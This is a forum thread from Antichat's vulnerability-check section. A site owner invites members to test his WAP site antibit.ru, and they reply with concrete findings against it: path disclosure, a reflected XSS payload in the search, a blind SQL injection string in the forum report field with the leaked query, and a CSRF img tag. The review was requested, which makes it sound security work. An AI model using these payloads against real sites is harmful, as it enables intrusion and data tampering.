Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   ВАП сайт. Нужна проверка. (https://forum.antichat.xyz/showthread.php?t=156397)

azote 14.11.2009 00:37
ВАП сайт. Нужна проверка.
 
Cайт antibit.ru
Проверьте пожалуйста, тем кто чем-нибудь поможет, буду очень и весьма признателен.
Картинка ачата стоит.

Тестовый Аккаунт:
login: antichat
pass: antichat


Хотелось бы проверить:


http://antibit.ru/forum/ (особенно при добавлении файла в тему)
http://antibit.ru/add/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
http://antibit.ru/files

S00pY 14.11.2009 15:25
antibit.ru/index.php?do=files&name[]=Din
раскрытие пути
------------------
index.php?do=files&name=Din
пасив xss в поиске

XenkoK 15.11.2009 02:21
Цитата:
Сообщение от azote
Cпасибо, убрал.


А можно поподробней узнать где тут Хss ?

гг перейди: http://antibit.ru/index.php?do=files&name=Din

и в поиске напишы: "><script>alert()</script>

azote 22.12.2009 21:48
Акутально. Картинка ачата стоит. Тестовый акк дал. В шапке указал модули которые хотелось бы проверить.

m0Hze 23.12.2009 01:20
http://antibit.ru/index.php?do=members&orderby[]=warn_up

SnooPy 03.01.2010 18:54
http://antibit.ru/members/ в поиске кавычку отфильтруй!

azote 22.04.2010 23:35
Хотелось бы првоерить:

http://antibit.ru/forum/
http://antibit.ru/members/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/

life_glider 23.04.2010 04:57
SQL
 
SQL-injection в insert-е, вроде как слепая.
Уязвимо поле причина жалобы в форуме когда нажимаем пожаловаться.
http://antibit.ru/forum/topic_101/report/2
вставил
123','123338', 'system', '1271983556', 'no', VERSION())/*
прошло
123','123338', 'system', '1271983556', 'no', VERSION()')/*
обана
PHP код:
INSERT INTO dle_pm (subjtextuseruser_fromdatepm_readfoldervalues ('Жалоба на сообщение форума.''Данную жалобу вам отправил antichat<br>
Текст жалобы: 123','123338''system''1271983556''no'VERSION()')/*<br>
Тема: <a href="http://antibit.ru/index.php?do=forum&showtopic=255">Перейти в тему</a><br>
ID сообщения: 2'338'system''1271983702''no''inbox'
Раскрытие путей:
PHP код:
Warningsocket_write(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 239 Warningsocket_close(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 294 
http://antibit.ru/icq_send/send/359
CSRF:
Добавляем В ИГНОР:
<img src="http://antibit.ru/ignors/add/358" alt="" />

azote 28.05.2010 16:57
Обновил шапку, проверьте пожалуйста.


Время: 03:42